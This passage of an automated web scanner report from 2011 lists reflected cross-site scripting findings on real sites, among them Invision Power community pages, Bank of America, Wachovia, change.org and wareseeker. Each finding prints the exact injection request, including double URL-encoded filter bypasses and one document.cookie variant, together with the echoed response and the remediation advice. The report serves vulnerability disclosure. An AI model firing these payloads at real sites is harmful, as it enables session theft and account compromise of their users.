<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1"; ipb.sharelinks.title = "Vanilla Valentine"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.45. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf855"-alert(1)-"7755996cd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1"; ipb.sharelinks.title = "(SOS31) File Version in Online List"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.46. http://community.invisionpower.com/files/file/3943-speed/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3943-speed/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7e3"-alert(1)-"7fa62b66d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1"; ipb.sharelinks.title = "Speed"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.47. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3944-ipchat-12-turkish-language-pack/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9a9"-alert(1)-"dc3219cb2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1"; ipb.sharelinks.title = "IP.Chat 1.2 Turkish Language Pack"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.48. http://community.invisionpower.com/resources/documentation/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://community.invisionpower.com
Path:
/resources/documentation/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 455b5'><a>78f4a32a5a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /resources/documentation/index.html?455b5'><a>78f4a32a5a9=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html?455b5'><a>78f4a32a5a9=1' /> ...[SNIP]...
3.49. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dff31'><script>alert(1)</script>1470dab73a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1' /> ...[SNIP]...
3.50. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9564a'><script>alert(1)</script>f6702a3a7ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1' /> ...[SNIP]...
3.51. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da888'><script>alert(1)</script>8095f60edfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1' /> ...[SNIP]...
3.52. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3f88'><script>alert(1)</script>0031e83123d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1' /> ...[SNIP]...
3.53. http://community.invisionpower.com/resources/official.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://community.invisionpower.com
Path:
/resources/official.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e492'><a>093e292e14d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /resources/official.html?2e492'><a>093e292e14d=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29 was submitted in the REST URL parameter 2. This input was echoed as 3cf50"><script>alert(1)</script>89c53a9cf29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /japan-news/16713cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29/tuna-costs-254-000-in-japan/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039cj9PCk000000iW6rcNrdSziWggn6yemmaw--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:03:09 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/16713cf50"><script>alert(1)</script>89c53a9cf29/tuna-costs-254-000-in-japan/&title=Chinese%20New%20Year%20boosts%20Japan%20tourism"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c was submitted in the REST URL parameter 3. This input was echoed as c2d11"><script>alert(1)</script>3dcc286b11c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /japan-news/1671/tuna-costs-254-000-in-japanc2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039cn9Q4p0000004Xg2fUaiviCivWQ_RWXE4w--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:03:12 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japanc2d11"><script>alert(1)</script>3dcc286b11c/&title=Tuna%20costs%20%A3254%2C000%20in%20Japan"> ...[SNIP]...
3.56. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bf2b</script><script>alert(1)</script>36bc7e08caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b</script><script>alert(1)</script>36bc7e08caf=1 HTTP/1.1 Host: news.change.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.57. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://privacyassist.bankofamerica.com
Path:
/Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a68'-alert(1)-'bbae7f15828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pages/English/In_Activation.asp?73a68'-alert(1)-'bbae7f15828=1 HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33448 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=BCDJILIAFFAGBBIDFABDKBNE; secure; path=/ Date: Wed, 02 Feb 2011 21:59:59 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <!-- var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?73a68'-alert(1)-'bbae7f15828=1'; strHref = strHref.toLowerCase() if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 ) { v ...[SNIP]...
3.58. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://privacyassist.bankofamerica.com
Path:
/Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6508"><a>a5002a02ed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Pages/English/In_Activation.asp?e6508"><a>a5002a02ed4=1 HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33648 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=NADJILIAAEJKGBMFKCCKAKFC; secure; path=/ Date: Wed, 02 Feb 2011 21:59:54 GMT Connection: close
<script type="text/javascript"> alert ("Special Characters are not allowed."); location.href = "http://www.bankofamerica.com"; </script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr ...[SNIP]... <a class="menu" title="Home" name="Home_Header_Login.asp" href="https://privacyassist.bankofamerica.com/home.asp?e6508"><a>a5002a02ed4=1"> ...[SNIP]...
3.59. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://privacyassist.bankofamerica.com
Path:
/Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e508d"-alert(1)-"e0d6dc517b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pages/English/In_Activation.asp?e508d"-alert(1)-"e0d6dc517b3=1 HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33448 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=NBDJILIAKMMGBBIBOJIMHFBD; secure; path=/ Date: Wed, 02 Feb 2011 21:59:58 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <!-- function GoPage(page) { var sSQuery = "e508d"-alert(1)-"e0d6dc517b3=1";
3.60. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.wachovia.com
Path:
/selfservice/microsites/wachoviaSearchEntry.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c128"><script>alert(1)</script>0f891e45ab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selfservice/microsites/wachoviaSearchEntry.do?9c128"><script>alert(1)</script>0f891e45ab3=1 HTTP/1.1 Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=C50552A4ACD37FDD2EC8A63C0E354E97; Path=/selfservice Content-Type: text/html;charset=UTF-8 Date: Wed, 02 Feb 2011 22:02:36 GMT Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8b75"><script>alert(1)</script>47d05c4592a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ip-boardc8b75"><script>alert(1)</script>47d05c4592a/ HTTP/1.1 Host: search.wareseeker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:24:37 GMT Server: Apache Set-Cookie: PHPSESSID=4rtpcdn9ep0nfp5tqbhmaq6ve1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55139
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]... <a title="ip boardc8b75 script alert 1 script 47d05c4592a Free Download - windows software" href="http://download.wareseeker.com/ip-boardc8b75"><script>alert(1)</script>47d05c4592a/" class="selected allsoftware"> ...[SNIP]...
3.62. http://search.wareseeker.com/ip-board/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.wareseeker.com
Path:
/ip-board/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad93e"><script>alert(1)</script>125f5dcb899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1 HTTP/1.1 Host: search.wareseeker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:24:34 GMT Server: Apache Set-Cookie: PHPSESSID=v5k6266f8pht791v1r546ej5o3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56242
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]... <a rel="nofollow" href="http://search.wareseeker.com/ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1p-2/"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a25e7<a>ea4068e9f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/WareSeekercoma25e7<a>ea4068e9f94/ROS/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
